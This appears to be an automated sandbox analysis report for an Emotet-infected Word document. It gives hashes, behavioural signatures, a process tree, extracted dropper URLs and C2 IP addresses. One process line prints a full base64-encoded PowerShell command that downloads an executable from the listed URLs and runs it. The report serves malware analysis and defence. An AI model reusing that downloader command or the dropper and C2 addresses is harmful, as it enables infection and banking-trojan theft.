Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    31s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    28-07-2020 23:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0c3aff898f5e6ef6910753858c239d64f476355b2387fa8b0fde53e1ff06facc.doc

  • Size

    175KB

  • MD5

    79326b92cab75e190998b04779d2fcf8

  • SHA1

    4a0b7659ae5065817ab58f275796bfb962c29e85

  • SHA256

    0c3aff898f5e6ef6910753858c239d64f476355b2387fa8b0fde53e1ff06facc

  • SHA512

    1e5b018bd1e0fbb38af0ff23513435a5cd708b5727f19f2dc3108c0926edbdfe951475597b85ddbe19da276956a87d84fd04b78902097a9512d167babc54101a

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://fishbitedesign.com/delete_me/aq_no3_pixel079b/
exe.dropper

http://floridoweddings.com/wp-admin/1_fb_3rv7z6mr/
exe.dropper

http://floydswoodshop.com/floydswo/nn_g5_0s/
exe.dropper

http://fmcav.com/images/tihvt_5d_3znqq/
exe.dropper

http://goharm.com/wp-content/plugins/classic-editor/7b_k5_bo4lrnbmo6/

Extracted

Family

emotet

C2

76.27.179.47:80

212.51.142.238:8080

189.212.199.126:443

61.19.246.238:443

162.154.38.103:80

91.211.88.52:7080

83.110.223.58:443

124.45.106.173:443

116.203.32.252:8080

109.117.53.230:443

5.196.74.210:8080

75.139.38.211:80

168.235.67.138:7080

176.111.60.55:8080

169.239.182.217:8080

74.208.45.104:8080

31.31.77.83:443

222.214.218.37:4143

37.139.21.175:8080

91.205.215.66:443
rsa_pubkey.plain

Signatures

  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0c3aff898f5e6ef6910753858c239d64f476355b2387fa8b0fde53e1ff06facc.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1060
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABBAE4ATABWAE4AaQBmAHoAPQAnAEoAQgBXAE4AUQBpAGUAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIAYABpAGAAVABZAFAAUgBPAHQAbwBjAG8ATAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEcATQBCAFcASQBtAGsAawAgAD0AIAAnADIAMgA3ACcAOwAkAFYAWABZAEUARgB3AHcAcQA9ACcASQBUAEUASwBVAHUAdgBsACcAOwAkAE0AUwBSAEsASgB1AGQAdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARwBNAEIAVwBJAG0AawBrACsAJwAuAGUAeABlACcAOwAkAFEARgBKAEUASwBoAHQAdAA9ACcAVABXAFMAUwBFAGcAbABwACcAOwAkAFcAQgBWAE0ASABqAHAAeQA9AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAEUAYgBjAGwAaQBlAG4AdAA7ACQARgBHAFQASABBAGEAZABkAD0AJwBoAHQAdABwADoALwAvAGYAaQBzAGgAYgBpAHQAZQBkAGUAcwBpAGcAbgAuAGMAbwBtAC8AZABlAGwAZQB0AGUAXwBtAGUALwBhAHEAXwBuAG8AMwBfAHAAaQB4AGUAbAAwADcAOQBiAC8AKgBoAHQAdABwADoALwAvAGYAbABvAHIAaQBkAG8AdwBlAGQAZABpAG4AZwBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAxAF8AZgBiAF8AMwByAHYANwB6ADYAbQByAC8AKgBoAHQAdABwADoALwAvAGYAbABvAHkAZABzAHcAbwBvAGQAcwBoAG8AcAAuAGMAbwBtAC8AZgBsAG8AeQBkAHMAdwBvAC8AbgBuAF8AZwA1AF8AMABzAC8AKgBoAHQAdABwADoALwAvAGYAbQBjAGEAdgAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwB0AGkAaAB2AHQAXwA1AGQAXwAzAHoAbgBxAHEALwAqAGgAdAB0AHAAOgAvAC8AZwBvAGgAYQByAG0ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwAGwAdQBnAGkAbgBzAC8AYwBsAGEAcwBzAGkAYwAtAGUAZABpAHQAbwByAC8ANwBiAF8AawA1AF8AYgBvADQAbAByAG4AYgBtAG8ANgAvACcALgAiAFMAcABsAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQwBJAEcAWgBSAHIAcwBxAD0AJwBGAFIAQgBUAFUAeABrAG0AJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAQgBRAFUARgBpAHcAeQAgAGkAbgAgACQARgBHAFQASABBAGEAZABkACkAewB0AHIAeQB7ACQAVwBCAFYATQBIAGoAcAB5AC4AIgBkAE8AVwBOAEwAbwBhAGAAZABGAGAAaQBgAGwAZQAiACgAJABGAEIAUQBVAEYAaQB3AHkALAAgACQATQBTAFIASwBKAHUAZAB2ACkAOwAkAFAAUQBOAFIASwBtAG8AZAA9ACcAVQBQAE8AWABaAGYAZQB0ACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATQBTAFIASwBKAHUAZAB2ACkALgAiAGwARQBgAE4ARwBUAEgAIgAgAC0AZwBlACAAMgAyADEAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAFIAYABlAGEAdABlACIAKAAkAE0AUwBSAEsASgB1AGQAdgApADsAJABRAE4AUwBMAFQAbgBvAGMAPQAnAEEAQwBWAEkAUwBnAHYAeQAnADsAYgByAGUAYQBrADsAJABMAFkAVQBMAE8AeAB5AGEAPQAnAEgAUwBXAE8AQQB1AHgAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAEYAVQBEAFYAagBoAGQAPQAnAFkASABXAFIARABnAGIAaQAnAA==
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in System32 directory
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    PID:1672
  • C:\Users\Admin\227.exe
    C:\Users\Admin\227.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Drops file in System32 directory
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1772
    • C:\Windows\SysWOW64\api-ms-win-service-management-l2-1-0\mfplat.exe
      "C:\Windows\SysWOW64\api-ms-win-service-management-l2-1-0\mfplat.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1272

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1060-2-0x0000000008A50000-0x0000000008A54000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1060-4-0x0000000007070000-0x0000000007270000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1060-5-0x000000000AF30000-0x000000000AF34000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1060-6-0x000000000BFB0000-0x000000000BFB4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1060-8-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1272-14-0x00000000002A0000-0x00000000002AC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1772-10-0x0000000000260000-0x000000000026C000-memory.dmp

    Filesize

    48KB

    Download